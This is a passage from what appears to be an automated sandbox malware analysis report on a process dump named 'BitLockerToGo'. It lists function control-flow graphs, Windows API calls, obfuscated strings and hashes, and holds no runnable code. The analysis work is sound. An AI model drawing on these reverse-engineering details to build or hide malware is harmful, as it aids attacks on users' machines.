40c490-40c4bc 563->569 565 40c500-40c50c 564->565 566 40c4c7-40c4d4 564->566 571 40c593-40c598 565->571 570 40c4e7-40c4eb 566->570 567->557 567->558 568->567 569->564 569->569 570->546 572 40c4ed-40c4f4 570->572 571->534 573 40c4f6-40c4f8 572->573 574 40c4fa 572->574 573->574 575 40c4e0-40c4e5 574->575 576 40c4fc-40c4fe 574->576 575->570 577 40c511-40c513 575->577 576->575 577->546 578 40c515-40c52b 577->578 578->571 579 40c52d-40c52f 578->579 580 40c533-40c536 579->580 581 40c538-40c558 call 40db90 580->581 582 40c58d 580->582 585 40c562-40c568 581->585 586 40c55a-40c560 581->586 582->571 585->571 586->580 586->585
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (+$A$_jIYC2pQ1pswVVaeyx4n19P1ZvDbEX.5r1GxGZkKCpE-1728848096-0.0.1.1-/api$~
                                                                                                                                                            • API String ID: 0-1713775397
                                                                                                                                                            • Opcode ID: 7cb605134ac94ffdcf6288be40dd188c96069c587b8b6afe075ddef6a9cd403c
                                                                                                                                                            • Instruction ID: 44a5d8f24ed4e4816ddfe326b5df41ea1088b2b54770a45eea7b330fb46f4ede
                                                                                                                                                            • Opcode Fuzzy Hash: 7cb605134ac94ffdcf6288be40dd188c96069c587b8b6afe075ddef6a9cd403c
                                                                                                                                                            • Instruction Fuzzy Hash: 28E1587410C380DBD315DF18C490A2FBBE1AF95758F188A6EE4D9AB391C339D846CB5A
                                                                                                                                                            Function 004365E0 Relevance: 1.6, APIs: 1, Instructions: 88comCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 863 4365e0-43665d 864 4366ab-4366c5 863->864 865 43665f 863->865 868 4366d6-436720 CoCreateInstance 864->868 869 4366cc 864->869 866 436660-4366a9 865->866 866->864 866->866 868->868 868->869 869->868
                                                                                                                                                            APIs
                                                                                                                                                            • CoCreateInstance.OLE32(00441A50,00000000,00000001,00441A40,00000000), ref: 00436715
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 542301482-0
                                                                                                                                                            • Opcode ID: e5a2a0082c67cb5c301fccf9abeaebcbd6283177cfdf17d39ad2cc2ad519dbb3
                                                                                                                                                            • Instruction ID: ea9f0b6cca55687af24dae82e070ca9713baacfb2e686af0d95a4beb36605997
                                                                                                                                                            • Opcode Fuzzy Hash: e5a2a0082c67cb5c301fccf9abeaebcbd6283177cfdf17d39ad2cc2ad519dbb3
                                                                                                                                                            • Instruction Fuzzy Hash: 233169B4110B409BE334CF26C999B53BBF5EB89714F448A1DE5DB4BA80CBB4B4098F95
                                                                                                                                                            Function 0043C800 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • LdrInitializeThunk.NTDLL(0040EF35,?,00000001,?), ref: 0043C82E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                            • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                            • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                            • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                                            Function 0043BC78 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 5acfd14c27bde9b74bf5aca11f72f78e1ca5bbfd350eb031bc15054e0debc95a
                                                                                                                                                            • Instruction ID: 6a5b91908db97ac0091159e2d275d9b84e4347aafb7fecb6be556b6923d5ccbe
                                                                                                                                                            • Opcode Fuzzy Hash: 5acfd14c27bde9b74bf5aca11f72f78e1ca5bbfd350eb031bc15054e0debc95a
                                                                                                                                                            • Instruction Fuzzy Hash: 9621C0748042558FDB14CFA8C9906BEBBB1AF06301F24459EC59233391D734BA41CBE9
                                                                                                                                                            Function 0040A9A0 Relevance: 4.5, APIs: 3, Instructions: 34COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 587 40a9a0-40a9b5 call 40aa20 call 43ba30 592 40a9b7 587->592 593 40a9b9-40a9c6 GetCurrentProcess call 431c10 587->593 594 40aa00-40aa0c ExitProcess 592->594 597 40a9c8 593->597 598 40a9ca-40a9e0 GetWindowInfo call 40b810 593->598 599 40a9f9-40a9fe call 43c6c0 597->599 602 40a9e5-40a9e7 598->602 599->594 604 40a9e9 602->604 605 40a9eb-40a9f5 call 40dcf0 call 40cc60 602->605 607 40a9f7 604->607 605->607 607->599
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$CurrentExit
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2333725396-0
                                                                                                                                                            • Opcode ID: b203863fcc5dfd2f2068b8a58807d9dee33faf21cb1ad893444914451a0ecebb
                                                                                                                                                            • Instruction ID: 4218e29b3bc86311983865424d116f639c7e788c7b42be7a3867dd50df405cf1
                                                                                                                                                            • Opcode Fuzzy Hash: b203863fcc5dfd2f2068b8a58807d9dee33faf21cb1ad893444914451a0ecebb
                                                                                                                                                            • Instruction Fuzzy Hash: 96F082B061871496CA103B768B0B32E3B546F11348F424E3BFD82711D1DB7C48B6A69F
                                                                                                                                                            Function 0043C63D Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 205memoryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 653 43c63d-43c653 654 43c722-43c73f 653->654 655 43c381-43c3c1 653->655 656 43c7c1 653->656 657 43c700-43c702 653->657 658 43c7c7-43c7cd call 43a6f0 653->658 659 43c706-43c70d 653->659 660 43c7ea-43c7f1 653->660 661 43c4af-43c4d4 call 43e080 653->661 662 43c46e-43c493 call 43e080 653->662 663 43c792 653->663 664 43c7d0-43c7d6 call 43a6f0 653->664 665 43c790 653->665 666 43c7b0-43c7b5 RtlReAllocateHeap 653->666 667 43c5d5-43c5dd 653->667 668 43c374-43c37a 653->668 669 43c714-43c71b 653->669 670 43c79b-43c7a6 653->670 671 43c7df-43c7e8 call 43a780 653->671 672 43c57d-43c58e 653->672 673 43c49d-43c4a8 653->673 674 43c741 654->674 675 43c77c-43c787 654->675 676 43c3c3 655->676 677 43c409-43c43f call 43db30 655->677 657->659 658->664 659->654 659->656 659->658 659->660 659->663 659->664 659->665 659->666 659->669 659->670 659->671 696 43c4e4-43c4fe call 43c840 661->696 662->673 663->670 664->671 666->656 683 43c5e7-43c5fa 667->683 668->655 668->657 668->659 668->661 668->667 668->669 669->654 669->660 669->663 669->665 669->666 669->670 669->671 670->666 671->660 672->667 673->654 673->656 673->657 673->658 673->659 673->660 673->661 673->663 673->664 673->665 673->666 673->667 673->669 673->670 673->671 684 43c750-43c77a 674->684 675->665 685 43c3d0-43c407 676->685 677->667 677->672 677->683 693 43c343-43c358 call 435cd0 677->693 700 43c1a2-43c1ad 677->700 701 43c362-43c36d 677->701 702 43c331-43c33c 677->702 703 43c446-43c44f 677->703 704 43c1c6-43c200 677->704 705 43c1b4-43c1bf 677->705 706 43c468 677->706 683->657 683->667 683->672 683->693 684->675 684->684 685->677 685->685 693->701 696->672 700->704 700->705 700->706 701->655 701->657 701->659 701->661 701->667 701->668 701->669 701->673 702->667 702->693 702->700 702->701 702->704 702->705 702->706 708 43c451 703->708 709 43c456-43c45e 703->709 704->667 704->672 704->696 711 43c31f-43c32a 704->711 705->693 705->700 705->701 705->704 705->705 705->706 706->673 708->709 709->706 711->667 711->672 711->683 711->693 711->700 711->701 711->702 711->704 711->705 711->706
                                                                                                                                                            APIs
                                                                                                                                                            • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000), ref: 0043C7B5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID: bkC
                                                                                                                                                            • API String ID: 1279760036-164674686
                                                                                                                                                            • Opcode ID: fc67cc29f5e8b9454afda8e38ad6b9b3aed85a913dfc2044a9caebc309474b4c
                                                                                                                                                            • Instruction ID: 57bb3bdb3c83f7f27277d3be29dd4639150ad412d8f3ab5f7e23676a3f5a600c
                                                                                                                                                            • Opcode Fuzzy Hash: fc67cc29f5e8b9454afda8e38ad6b9b3aed85a913dfc2044a9caebc309474b4c
                                                                                                                                                            • Instruction Fuzzy Hash: 095135BA918161DFCB049FB8ED915AE7B74FF0A305F0504B8D441673A1D7345A02CBE5
                                                                                                                                                            Function 0043566A Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 712 43566a-435699 GetCurrentProcess call 43e080 716 43569b 712->716 717 43569d-4356c0 GetUserDefaultUILanguage call 419ee0 712->717 716->717 719 4356c5-435740 call 419ee0 * 3 717->719 726 435745-435753 719->726 726->726 727 435755 726->727 728 43575c-435762 727->728 729 435797-4357ae 728->729 730 435764-435795 call 43a5a0 728->730 730->728
                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0043566A
                                                                                                                                                            • GetUserDefaultUILanguage.KERNELBASE ref: 0043569D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentDefaultLanguageProcessUser
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4043730634-0
                                                                                                                                                            • Opcode ID: e8e69d52529d9b3024fb9fc69b6d92add96fb0e78604761e38fd6f46cc65e290
                                                                                                                                                            • Instruction ID: f09ea27b4f4602716aeb15a8b3b72605140b3d9120e4ea613be95b47a89f691f
                                                                                                                                                            • Opcode Fuzzy Hash: e8e69d52529d9b3024fb9fc69b6d92add96fb0e78604761e38fd6f46cc65e290
                                                                                                                                                            • Instruction Fuzzy Hash: E731A1B59052548FC710EF68E9453AE7FB0EB25309F1449ADD488A7342E7748E98CFA3
                                                                                                                                                            Function 0043680F Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 733 43680f-436815 734 4367f0-436801 CoSetProxyBlanket 733->734 735 4367c9 733->735 736 4367cf-4367e6 CoSetProxyBlanket 733->736 737 43680d 733->737 734->737 735->736 736->734 737->733
                                                                                                                                                            APIs
                                                                                                                                                            • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004367E0
                                                                                                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,Function_000367F0), ref: 00436801
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlanketProxy
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3890896728-0
                                                                                                                                                            • Opcode ID: 1f4c462caab9f6b2ed01f987ea2e79c0f021f0dc3f4c8e4d67c731682aa1e547
                                                                                                                                                            • Instruction ID: 85de96fdc2472c7becba0e1e7cde9433106db14601eb3176dfd388c25d5d3e4d
                                                                                                                                                            • Opcode Fuzzy Hash: 1f4c462caab9f6b2ed01f987ea2e79c0f021f0dc3f4c8e4d67c731682aa1e547
                                                                                                                                                            • Instruction Fuzzy Hash: 84E0FE393D8700BFF2364B50ED17F057665BB0AF02F601564B3867C5E097F176119A48
                                                                                                                                                            Function 0043C070 Relevance: 1.8, APIs: 1, Instructions: 300COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 738 43c070-43c07b 739 43c082-43c08d 738->739 740 43c110-43c11b 738->740 741 43c094-43c09f 738->741 739->739 739->740 739->741 742 43bd56-43bd5f 739->742 746 43c122-43c12d 740->746 747 43c190-43c19b 740->747 748 43c146-43c151 740->748 749 43c134-43c13f 740->749 750 43c434-43c43f 740->750 751 43c158-43c15b 740->751 752 43c31f-43c32a 740->752 743 43c0a6-43c0b1 741->743 744 43c1f5-43c200 741->744 745 43c0b8-43c0c0 741->745 765 43bd61 742->765 766 43bd66-43bd6e 742->766 743->743 743->744 743->745 744->752 753 43c5d5-43c5dd 744->753 754 43c4e4-43c4fe call 43c840 744->754 755 43c57d-43c58e 744->755 745->740 746->748 746->749 746->750 746->751 746->752 757 43c1a2-43c1ad 747->757 758 43c362-43c36d 747->758 762 43c1c6-43c1c9 747->762 763 43c1b4-43c1bf 747->763 764 43c468 747->764 748->746 748->747 748->748 748->749 748->750 748->751 748->752 749->748 749->750 749->751 750->753 750->755 756 43c343-43c358 call 435cd0 750->756 750->757 750->758 759 43c331-43c33c 750->759 760 43c5e7-43c5fa 750->760 761 43c446-43c44f 750->761 750->762 750->763 750->764 751->747 752->753 752->755 752->756 752->757 752->758 752->759 752->760 752->762 752->763 752->764 753->760 754->755 755->753 756->758 757->762 757->763 757->764 758->753 768 43c700-43c702 758->768 769 43c381-43c3c1 758->769 770 43c706-43c70d 758->770 771 43c374-43c37a 758->771 772 43c714-43c71b 758->772 773 43c4af-43c4d4 call 43e080 758->773 774 43c49d-43c4a8 758->774 759->753 759->756 759->757 759->758 759->762 759->763 759->764 760->753 760->755 760->756 760->768 775 43c451 761->775 776 43c456-43c45e 761->776 762->744 763->756 763->757 763->758 763->762 763->763 763->764 764->774 765->766 766->738 768->770 789 43c3c3 769->789 790 43c409-43c42a call 43db30 769->790 770->772 779 43c722-43c73f 770->779 780 43c792 770->780 781 43c7c1 770->781 782 43c7d0-43c7d6 call 43a6f0 770->782 783 43c790 770->783 784 43c7b0-43c7b5 RtlReAllocateHeap 770->784 785 43c7c7-43c7cd call 43a6f0 770->785 786 43c79b-43c7a6 770->786 787 43c7ea-43c7f1 770->787 788 43c7df-43c7e8 call 43a780 770->788 771->753 771->768 771->769 771->770 771->772 771->773 772->779 772->780 772->783 772->784 772->786 772->787 772->788 773->754 774->753 774->768 774->770 774->772 774->773 774->779 774->780 774->781 774->782 774->783 774->784 774->785 774->786 774->787 774->788 775->776 776->764 793 43c741 779->793 794 43c77c-43c787 779->794 780->786 782->788 784->781 785->782 786->784 788->787 795 43c3d0-43c407 789->795 790->750 801 43c750-43c77a 793->801 794->783 795->790 795->795 801->794 801->801
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 56f2cde8574eee09f3081d6bcea0eee43c20573740af628ce17efc6299b0352e
                                                                                                                                                            • Instruction ID: 1cc2a8c18b6c764ba4a45f6788286f964cfa991a9b2d9288629432a8f761210c
                                                                                                                                                            • Opcode Fuzzy Hash: 56f2cde8574eee09f3081d6bcea0eee43c20573740af628ce17efc6299b0352e
                                                                                                                                                            • Instruction Fuzzy Hash: B691D67A928164DFDB006FB8BC555AE77B4AB0F352F060CB5D491A3261E3384A17CBE4
                                                                                                                                                            Function 0043C696 Relevance: 1.7, APIs: 1, Instructions: 236COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 807 43c696-43c6ae 808 43c343-43c358 call 435cd0 807->808 809 43c331-43c33c 807->809 810 43c700-43c702 807->810 811 43c5e7-43c5fa 807->811 812 43c446-43c44f 807->812 813 43c5d5-43c5dd 807->813 814 43c57d-43c58e 807->814 818 43c362-43c36d 808->818 809->808 809->813 817 43c1a2-43c1ad 809->817 809->818 819 43c1c6-43c200 809->819 820 43c1b4-43c1bf 809->820 821 43c468 809->821 824 43c706-43c70d 810->824 811->808 811->810 811->813 811->814 815 43c451 812->815 816 43c456-43c45e 812->816 813->811 814->813 815->816 816->821 817->819 817->820 817->821 818->810 818->813 818->824 825 43c381-43c3c1 818->825 826 43c374-43c37a 818->826 827 43c714-43c71b 818->827 828 43c4af-43c4d4 call 43e080 818->828 829 43c49d-43c4a8 818->829 819->813 819->814 844 43c4e4-43c4fe call 43c840 819->844 845 43c31f-43c32a 819->845 820->808 820->817 820->818 820->819 820->820 820->821 821->829 824->827 830 43c722-43c73f 824->830 831 43c792 824->831 832 43c7c1 824->832 833 43c7d0-43c7d6 call 43a6f0 824->833 834 43c790 824->834 835 43c7b0-43c7b5 RtlReAllocateHeap 824->835 836 43c7c7-43c7cd call 43a6f0 824->836 837 43c79b-43c7a6 824->837 838 43c7ea-43c7f1 824->838 839 43c7df-43c7e8 call 43a780 824->839 841 43c3c3 825->841 842 43c409-43c43f call 43db30 825->842 826->810 826->813 826->824 826->825 826->827 826->828 827->830 827->831 827->834 827->835 827->837 827->838 827->839 828->844 829->810 829->813 829->824 829->827 829->828 829->830 829->831 829->832 829->833 829->834 829->835 829->836 829->837 829->838 829->839 846 43c741 830->846 847 43c77c-43c787 830->847 831->837 833->839 835->832 836->833 837->835 839->838 848 43c3d0-43c407 841->848 842->808 842->809 842->811 842->812 842->813 842->814 842->817 842->818 842->819 842->820 842->821 844->814 845->808 845->809 845->811 845->813 845->814 845->817 845->818 845->819 845->820 845->821 854 43c750-43c77a 846->854 847->834 848->842 848->848 854->847 854->854
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: beb8109c3086ce93d8e06dcac9815687f02bbed8dc5eedd2f0637c2648827aae
                                                                                                                                                            • Instruction ID: 38727bc09f133ece8f5d57358d2970249bfacc476c6d579fc28860c1907593a6
                                                                                                                                                            • Opcode Fuzzy Hash: beb8109c3086ce93d8e06dcac9815687f02bbed8dc5eedd2f0637c2648827aae
                                                                                                                                                            • Instruction Fuzzy Hash: 617148BA918160DFDB049FB8ED905BE7B74AF0B316F0908F9D49163261D3385A02CBE5
                                                                                                                                                            Function 00436728 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 870 436728-436768 871 436797-4367b9 SysAllocString 870->871 872 43676a 870->872 874 4367bd-4367bf 871->874 873 436770-436795 872->873 873->871 873->873
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocString
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2525500382-0
                                                                                                                                                            • Opcode ID: d2c6052d94313f16ea65dfe563f55348c8d742d89dbb323326da04f1fcd23508
                                                                                                                                                            • Instruction ID: 5a0618e91a28a85d2f86b60d01bc68a50de2481b0f7dbb12c5016779150b87dc
                                                                                                                                                            • Opcode Fuzzy Hash: d2c6052d94313f16ea65dfe563f55348c8d742d89dbb323326da04f1fcd23508
                                                                                                                                                            • Instruction Fuzzy Hash: B0111570100B819FD370CF29C494A26BBF1FF4A309BA09C1DE1C28B651C776E442CB54
                                                                                                                                                            Function 0043A7A2 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 875 43a7a2-43a7a9 876 43a812-43a818 RtlFreeHeap 875->876 877 43a7b0-43a7c7 875->877 878 43a810 875->878 879 43a81e-43a823 875->879 876->879 880 43a7c9 877->880 881 43a7fc-43a807 877->881 878->876 882 43a7d0-43a7fa 880->882 881->878 882->881 882->882
                                                                                                                                                            APIs
                                                                                                                                                            • RtlFreeHeap.NTDLL(?,00000000), ref: 0043A818
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                            • Opcode ID: 467f385da2c6dae1b4972b3f25f99549e7419152301e6f524d1777dffb42152c
                                                                                                                                                            • Instruction ID: e58a62a467fcc3cf4ca00239bb9c62a929624cff67e618a81d4e951f87d01d60
                                                                                                                                                            • Opcode Fuzzy Hash: 467f385da2c6dae1b4972b3f25f99549e7419152301e6f524d1777dffb42152c
                                                                                                                                                            • Instruction Fuzzy Hash: 29018F38A40248DFEB00CF64D99069DBB36EB86319F64C0D8C445277A5C332AE53CB84
                                                                                                                                                            Function 0043A762 Relevance: 1.5, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043A76B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: 78e65d7e54fbb97d493f955b41e24730cb33fc9e0624615bae75e3f863140746
                                                                                                                                                            • Instruction ID: 97f73e13ff0ba3024f09bf4723230358ed07b21731cc37c5d5ce43716dcac73c
                                                                                                                                                            • Opcode Fuzzy Hash: 78e65d7e54fbb97d493f955b41e24730cb33fc9e0624615bae75e3f863140746
                                                                                                                                                            • Instruction Fuzzy Hash: 8AB09274100A00ABEA155B14DC25F207A25EB44709FA008A8A815854B2C6269836D988

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 00425380 Relevance: 64.9, APIs: 2, Strings: 35, Instructions: 182COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                                            • String ID: eB$ZB$aB$ $&`B$&dB$)YB$:fB$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$MdB$[aB$beB$y[B$YB$^B$`B
                                                                                                                                                            • API String ID: 4116985748-1301689713
                                                                                                                                                            • Opcode ID: ed2d5ffeca8568e32c327981134a743846ad8985eda272e08d3c848a72605f9e
                                                                                                                                                            • Instruction ID: 2be8b3321d8ebc35c174cfe65313f19d7b7ab85f5ee63cbee2d1089338e9952b
                                                                                                                                                            • Opcode Fuzzy Hash: ed2d5ffeca8568e32c327981134a743846ad8985eda272e08d3c848a72605f9e
                                                                                                                                                            • Instruction Fuzzy Hash: 71C17EB000A3849FE770DF15E54878BBBE4BB86348F91891EE4994B354D7B89548CF8B
                                                                                                                                                            Function 0041E6C0 Relevance: 38.3, Strings: 30, Instructions: 763COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: "A1C$*m(o$1Y6[$4`[b$4i<k$56$9M'O$9]-_$:9$;U0W$<I/K$<a[c$=E5G$@qFs$EuEw$IyK{$O!U#$PA$Q1U3$WP$WeQg$]5X7$]i)k$_-]/$h1i?$k>h0$o=K?$x:m<$y5n3$uw
                                                                                                                                                            • API String ID: 0-2269972215
                                                                                                                                                            • Opcode ID: 779dedc07c5897f8f241aca86a09de035cd84d31b5fffd4dc929a5109f8191e5
                                                                                                                                                            • Instruction ID: d94ce0ecc20038e688a02a3dea8145f2d16f1f88ab05816ea4259b122c1fea78
                                                                                                                                                            • Opcode Fuzzy Hash: 779dedc07c5897f8f241aca86a09de035cd84d31b5fffd4dc929a5109f8191e5
                                                                                                                                                            • Instruction Fuzzy Hash: A2821CB410C381CBE334CF25D580B9BBBE1BB86304F208A2DE5ED9B251DB748446CB96
                                                                                                                                                            Function 0041E850 Relevance: 38.2, Strings: 30, Instructions: 711COMMON
